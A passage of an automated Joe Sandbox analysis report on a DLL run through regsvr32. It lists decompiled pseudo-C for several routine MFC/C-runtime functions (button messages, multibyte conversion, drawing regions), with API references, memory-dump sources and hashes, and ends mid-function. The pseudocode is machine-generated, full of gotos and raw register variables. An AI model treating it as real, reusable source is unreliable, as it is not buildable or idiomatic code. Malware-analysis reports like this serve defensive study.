                                                                                                            0x1001c83a
                                                                                                            0x00000000
                                                                                                            0x1001c83c
                                                                                                            0x1001c734
                                                                                                            0x1001c741
                                                                                                            0x1001c74e
                                                                                                            0x1001c757
                                                                                                            0x1001c75a
                                                                                                            0x1001c75d
                                                                                                            0x1001c763
                                                                                                            0x1001c769
                                                                                                            0x1001c781
                                                                                                            0x1001c76b
                                                                                                            0x1001c76b
                                                                                                            0x1001c76b
                                                                                                            0x1001c78f
                                                                                                            0x1001c7ab
                                                                                                            0x1001c7ad
                                                                                                            0x1001c791
                                                                                                            0x1001c79a
                                                                                                            0x1001c7a1
                                                                                                            0x1001c7a6
                                                                                                            0x1001c7a6
                                                                                                            0x1001c7bb
                                                                                                            0x1001c7dc
                                                                                                            0x1001c7df
                                                                                                            0x1001c7bd
                                                                                                            0x1001c7c6
                                                                                                            0x1001c7cd
                                                                                                            0x1001c7d3
                                                                                                            0x1001c7d3
                                                                                                            0x1001c7ed
                                                                                                            0x1001c80e
                                                                                                            0x1001c811
                                                                                                            0x1001c7ef
                                                                                                            0x1001c7f8
                                                                                                            0x1001c7ff
                                                                                                            0x1001c805
                                                                                                            0x1001c805
                                                                                                            0x1001c819
                                                                                                            0x1001c81e
                                                                                                            0x1001c823
                                                                                                            0x1001c823
                                                                                                            0x1001c82c
                                                                                                            0x1001c831
                                                                                                            0x1001c837
                                                                                                            0x1001c837
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001c75d
                                                                                                            0x1001c743
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 1001C702
                                                                                                              • Part of subcall function 10004EB7: _wctomb_s.LIBCMT ref: 10004EC7
                                                                                                            • GetFileTime.KERNEL32(?,?,?,?), ref: 1001C739
                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 1001C74E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$SizeTime_memset_wctomb_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 26245289-0
                                                                                                            • Opcode ID: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
                                                                                                            • Instruction ID: 51a8328b60633bd59e5f15858ada0f86eee49ce44263773015f9aa20d2328a8a
                                                                                                            • Opcode Fuzzy Hash: 849433f6196f86cb5afcb6a6d1b4fa8c1ab3bc4dc122d4181a5b04c53ba76e7d
                                                                                                            • Instruction Fuzzy Hash: 0B410C759047099FC724CF68C881C9AB7F8FF087607118A2DE5A6DB691E770F984CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000F366 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1000F366(void* __ecx, struct HWND__** _a4) {
				struct HWND__** _v8;
				struct HWND__** _v12;
				long _t31;
				struct HWND__** _t32;
				struct HWND__** _t44;
				struct HWND__** _t45;
				long _t47;
				void* _t49;
				struct HWND__** _t63;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					_t31 = _a4;
					if(_t31 != 0) {
						if( *((intOrPtr*)(_t31 + 8)) == 0) {
							L4:
							_t32 = E1001B8D6( *((intOrPtr*)(_t49 + 0x4c)) + 0x40, _t31, 0);
							_v12 = _t32;
							_a4 = _t32;
							E1000911A( &_a4);
							while(_a4 != 0) {
								_t37 =  *((intOrPtr*)(E1000911A( &_a4)));
								_v8 =  *((intOrPtr*)(E1000911A( &_a4)));
								if((E1000F07E(_t37) & 0x00020000) != 0) {
									break;
								} else {
									_t45 = _v8;
									if(_t45[2] == 0 || SendMessageA( *_t45, 0xf0, 0, 0) != 1) {
										continue;
									} else {
										L16:
										_t44 = _v8;
										goto L17;
									}
								}
								goto L18;
							}
							_a4 = _v12;
							_t31 = E1000F16D( &_a4);
							while(_a4 != 0) {
								_t63 =  *(E1000F16D( &_a4));
								_v8 = _t63;
								if(_t63[2] == 0) {
									L13:
									_t31 = E1000F07E(_t63);
									if((_t31 & 0x00020000) == 0) {
										continue;
									}
								} else {
									if(SendMessageA( *_t63, 0xf0, 0, 0) == 1) {
										goto L16;
									} else {
										_t63 = _v8;
										goto L13;
									}
								}
								goto L18;
							}
						} else {
							_t47 = SendMessageA( *_t31, 0xf0, 0, 0);
							_t44 = _a4;
							if(_t47 == 1) {
								L17:
								_t31 = SendMessageA( *_t44, 0xf1, 0, 0);
							} else {
								goto L4;
							}
						}
						L18:
					}
				}
				return _t31;
			}












                                                                                                            0x1000f369
                                                                                                            0x1000f36a
                                                                                                            0x1000f36d
                                                                                                            0x1000f374
                                                                                                            0x1000f37a
                                                                                                            0x1000f37f
                                                                                                            0x1000f38f
                                                                                                            0x1000f3a8
                                                                                                            0x1000f3b0
                                                                                                            0x1000f3b8
                                                                                                            0x1000f3bb
                                                                                                            0x1000f3c5
                                                                                                            0x1000f406
                                                                                                            0x1000f3db
                                                                                                            0x1000f3df
                                                                                                            0x1000f3ec
                                                                                                            0x00000000
                                                                                                            0x1000f3ee
                                                                                                            0x1000f3ee
                                                                                                            0x1000f3f4
                                                                                                            0x00000000
                                                                                                            0x1000f461
                                                                                                            0x1000f461
                                                                                                            0x1000f461
                                                                                                            0x00000000
                                                                                                            0x1000f461
                                                                                                            0x1000f3f4
                                                                                                            0x00000000
                                                                                                            0x1000f3ec
                                                                                                            0x1000f411
                                                                                                            0x1000f41b
                                                                                                            0x1000f45a
                                                                                                            0x1000f431
                                                                                                            0x1000f436
                                                                                                            0x1000f439
                                                                                                            0x1000f44e
                                                                                                            0x1000f44e
                                                                                                            0x1000f458
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f43b
                                                                                                            0x1000f449
                                                                                                            0x00000000
                                                                                                            0x1000f44b
                                                                                                            0x1000f44b
                                                                                                            0x00000000
                                                                                                            0x1000f44b
                                                                                                            0x1000f449
                                                                                                            0x00000000
                                                                                                            0x1000f439
                                                                                                            0x1000f391
                                                                                                            0x1000f39a
                                                                                                            0x1000f39f
                                                                                                            0x1000f3a2
                                                                                                            0x1000f464
                                                                                                            0x1000f46d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000f3a2
                                                                                                            0x1000f46f
                                                                                                            0x1000f46f
                                                                                                            0x1000f37f
                                                                                                            0x1000f473

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1000F39A
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1000F3FF
                                                                                                            • SendMessageA.USER32(?,000000F0,00000000,00000000), ref: 1000F444
                                                                                                            • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 1000F46D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
                                                                                                            • Instruction ID: f3d15569573835c18d81f199704cf95a6a2abc57fcee4060fc3bf4c3a8b62e7d
                                                                                                            • Opcode Fuzzy Hash: 6d35c6499f517dbc8d4cda50e386da3e84cd8cfccc05535bafaf18b93e278df5
                                                                                                            • Instruction Fuzzy Hash: A9317E30501219FFEB15DF51C881EAF3BA9EF417D0F10806AF9059B619DA70AD80EB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002DB82 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1002DB82(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1002276D( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1002D2BC( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10020B71(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                                                                            0x1002db8a
                                                                                                            0x1002db91
                                                                                                            0x1002dba6
                                                                                                            0x00000000
                                                                                                            0x1002db98
                                                                                                            0x1002db9a
                                                                                                            0x1002dbb2
                                                                                                            0x1002dbb7
                                                                                                            0x1002dbba
                                                                                                            0x1002dbbd
                                                                                                            0x1002dbe6
                                                                                                            0x1002dbeb
                                                                                                            0x1002dbef
                                                                                                            0x1002dc70
                                                                                                            0x1002dc82
                                                                                                            0x1002dc8b
                                                                                                            0x1002dc8d
                                                                                                            0x1002dbcd
                                                                                                            0x1002dbcd
                                                                                                            0x1002dbd0
                                                                                                            0x1002dbd2
                                                                                                            0x1002dbd5
                                                                                                            0x1002dbd5
                                                                                                            0x1002dbd5
                                                                                                            0x1002dbd5
                                                                                                            0x00000000
                                                                                                            0x1002dbdb
                                                                                                            0x1002dc4f
                                                                                                            0x1002dc4f
                                                                                                            0x1002dc54
                                                                                                            0x1002dc5a
                                                                                                            0x1002dc5d
                                                                                                            0x1002dc5f
                                                                                                            0x1002dc62
                                                                                                            0x1002dc62
                                                                                                            0x1002dc62
                                                                                                            0x1002dc62
                                                                                                            0x00000000
                                                                                                            0x1002dc66
                                                                                                            0x1002dbf1
                                                                                                            0x1002dbf4
                                                                                                            0x1002dbf4
                                                                                                            0x1002dbfa
                                                                                                            0x1002dbfd
                                                                                                            0x1002dc24
                                                                                                            0x1002dc27
                                                                                                            0x1002dc27
                                                                                                            0x1002dc2d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc2f
                                                                                                            0x1002dc32
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc34
                                                                                                            0x1002dc34
                                                                                                            0x1002dc37
                                                                                                            0x1002dc37
                                                                                                            0x1002dc3d
                                                                                                            0x1002dbab
                                                                                                            0x1002dbab
                                                                                                            0x1002dc46
                                                                                                            0x00000000
                                                                                                            0x1002dc46
                                                                                                            0x1002dbff
                                                                                                            0x1002dc02
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc06
                                                                                                            0x1002dc14
                                                                                                            0x1002dc17
                                                                                                            0x1002dc1d
                                                                                                            0x1002dc1f
                                                                                                            0x1002dc22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002dc22
                                                                                                            0x1002dbbf
                                                                                                            0x1002dbc2
                                                                                                            0x1002dbc4
                                                                                                            0x1002dbca
                                                                                                            0x1002dbca
                                                                                                            0x00000000
                                                                                                            0x1002db9c
                                                                                                            0x1002db9c
                                                                                                            0x1002dba1
                                                                                                            0x1002dba3
                                                                                                            0x1002dba3
                                                                                                            0x00000000
                                                                                                            0x1002dba1
                                                                                                            0x1002db9a

                                                                                                            APIs
                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1002DBB2
                                                                                                            • __isleadbyte_l.LIBCMT ref: 1002DBE6
                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC17
                                                                                                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000001,?,00000001,1002D65D,?,?,00000002), ref: 1002DC85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                            • String ID:
                                                                                                            • API String ID: 3058430110-0
                                                                                                            • Opcode ID: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
                                                                                                            • Instruction ID: 37aa916cde1404fb766b6052f6d7e43a4bf17a9cf34586f159c1b1eafb0ae636
                                                                                                            • Opcode Fuzzy Hash: 3e2ec8070e78dc2584ef5f67e7d258c507cb05aa85bef0efbd0a2838ee37334f
                                                                                                            • Instruction Fuzzy Hash: 9131F231A0028AEFDB12EF64DC90AAE7BE5FF00351FA285AAE4608B191D370DD40DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016C75 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 80%
                                                                                                            			E10016C75(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr* _t77;
				signed int _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t84;

				_t83 = __eflags;
				_push(0x20);
				E1001FBC4(E10034195, __ebx, __edi, __esi);
				_t80 = 0;
				 *((intOrPtr*)(_t82 - 0x10)) = 0;
				 *((intOrPtr*)(_t82 - 0x14)) = 0x10038988;
				_t68 =  *((intOrPtr*)(_t82 + 8));
				_t71 = _t82 - 0x1c;
				 *(_t82 - 4) = 0;
				E1000EC55(_t82 - 0x1c, _t83,  *((intOrPtr*)(_t68 - 0xb0)));
				_t77 =  *((intOrPtr*)(_t82 + 0x14));
				_t84 = _t77;
				 *(_t82 - 4) = 1;
				_t85 = _t84 == 0;
				if(_t84 == 0) {
					E10004E6E(_t68, _t71, _t77, 0, _t85);
				}
				 *_t77 = _t80;
				if( *((intOrPtr*)(_t68 - 8)) == _t80) {
					_push(GetDC( *( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0xac)) + 0x20)) + 0x20)));
					_t51 = E1000FFD3(_t68, _t71, _t77, _t80, __eflags);
					__eflags = _t51 - _t80;
					 *((intOrPtr*)(_t68 - 8)) = _t51;
					if(_t51 == _t80) {
						goto L3;
					} else {
						__eflags =  *(_t82 + 0xc) - _t80;
						if( *(_t82 + 0xc) != _t80) {
							IntersectRect(_t82 - 0x2c, _t68 - 0x9c,  *(_t82 + 0xc));
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t77 =  *((intOrPtr*)(_t82 + 0x14));
							_t80 = 0;
						}
						E10010292(_t82 - 0x14, _t77, _t82, CreateRectRgnIndirect(_t82 - 0x2c));
						E1000FD9F( *((intOrPtr*)(_t68 - 8)), _t82 - 0x14, 1);
						_t69 =  *((intOrPtr*)(_t68 - 8));
						__eflags = _t69 - _t80;
						if(_t69 != _t80) {
							_t70 =  *((intOrPtr*)(_t69 + 4));
						} else {
							_t70 = 0;
						}
						__eflags =  *((intOrPtr*)(_t82 - 0x18)) - _t80;
						 *_t77 = _t70;
						 *(_t82 - 4) = 0;
						if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
							_push( *((intOrPtr*)(_t82 - 0x1c)));
							_push(_t80);
							E1000E519();
						}
						 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
						 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
						E100102E5(_t82 - 0x14);
						_t53 = 0;
						__eflags = 0;
					}
				} else {
					L3:
					 *(_t82 - 4) = 0;
					if( *((intOrPtr*)(_t82 - 0x18)) != _t80) {
						_push( *((intOrPtr*)(_t82 - 0x1c)));
						_push(_t80);
						E1000E519();
					}
					 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t82 - 0x14)) = 0x10038068;
					E100102E5(_t82 - 0x14);
					_t53 = 0x80004005;
				}
				return E1001FC9C(_t53);
			}













                                                                                                            0x10016c75
                                                                                                            0x10016c75
                                                                                                            0x10016c7c
                                                                                                            0x10016c81
                                                                                                            0x10016c83
                                                                                                            0x10016c86
                                                                                                            0x10016c8d
                                                                                                            0x10016c96
                                                                                                            0x10016c99
                                                                                                            0x10016c9c
                                                                                                            0x10016ca1
                                                                                                            0x10016ca6
                                                                                                            0x10016cab
                                                                                                            0x10016caf
                                                                                                            0x10016cb1
                                                                                                            0x10016cb3
                                                                                                            0x10016cb3
                                                                                                            0x10016cb8
                                                                                                            0x10016cbd
                                                                                                            0x10016d00
                                                                                                            0x10016d01
                                                                                                            0x10016d06
                                                                                                            0x10016d08
                                                                                                            0x10016d0b
                                                                                                            0x00000000
                                                                                                            0x10016d0d
                                                                                                            0x10016d0d
                                                                                                            0x10016d10
                                                                                                            0x10016d34
                                                                                                            0x10016d12
                                                                                                            0x10016d1b
                                                                                                            0x10016d1c
                                                                                                            0x10016d1d
                                                                                                            0x10016d1e
                                                                                                            0x10016d1f
                                                                                                            0x10016d22
                                                                                                            0x10016d22
                                                                                                            0x10016d48
                                                                                                            0x10016d56
                                                                                                            0x10016d5b
                                                                                                            0x10016d5e
                                                                                                            0x10016d60
                                                                                                            0x10016d66
                                                                                                            0x10016d62
                                                                                                            0x10016d62
                                                                                                            0x10016d62
                                                                                                            0x10016d69
                                                                                                            0x10016d6c
                                                                                                            0x10016d6e
                                                                                                            0x10016d72
                                                                                                            0x10016d74
                                                                                                            0x10016d77
                                                                                                            0x10016d78
                                                                                                            0x10016d78
                                                                                                            0x10016d7d
                                                                                                            0x10016d84
                                                                                                            0x10016d8b
                                                                                                            0x10016d90
                                                                                                            0x10016d90
                                                                                                            0x10016d90
                                                                                                            0x10016cbf
                                                                                                            0x10016cbf
                                                                                                            0x10016cc2
                                                                                                            0x10016cc6
                                                                                                            0x10016cc8
                                                                                                            0x10016ccb
                                                                                                            0x10016ccc
                                                                                                            0x10016ccc
                                                                                                            0x10016cd1
                                                                                                            0x10016cd8
                                                                                                            0x10016cdf
                                                                                                            0x10016ce4
                                                                                                            0x10016ce4
                                                                                                            0x10016d97

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10016C7C
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • GetDC.USER32(?), ref: 10016CFA
                                                                                                            • IntersectRect.USER32 ref: 10016D34
                                                                                                            • CreateRectRgnIndirect.GDI32(?), ref: 10016D3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prolog3Rect$CreateException@8IndirectIntersectThrow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2872313494-0
                                                                                                            • Opcode ID: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
                                                                                                            • Instruction ID: aba366ee442878ba1e0e253a8bcb53805126a2189cb4a44b534bc72d57d8081b
                                                                                                            • Opcode Fuzzy Hash: 66e4162995eff29e74f150a019b0503a6bfab80782a46ba9d83f80b8aff9d0d3
                                                                                                            • Instruction Fuzzy Hash: 45316A75D0026ADFDF02CFA4CD85AAEBBB5FF08340F118096E541AF141D775AA81CBA2
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011620 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 82%
                                                                                                            			E10011620(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000EC3C(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000EC09(_t51, _t65, 0, _t77) + 4));
					_t70 = E1001063D(0x10048490);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E10022FC3(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E1001F6F4(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001F631(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001F631(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E10022FC3(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E100069D9();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E10011554( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E10011554( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}





















                                                                                                            0x10011620
                                                                                                            0x10011620
                                                                                                            0x1001162a
                                                                                                            0x1001162c
                                                                                                            0x10011633
                                                                                                            0x1001170b
                                                                                                            0x10011716
                                                                                                            0x10011716
                                                                                                            0x10011639
                                                                                                            0x1001163c
                                                                                                            0x1001163f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10011648
                                                                                                            0x1001168c
                                                                                                            0x1001168c
                                                                                                            0x10011692
                                                                                                            0x1001169f
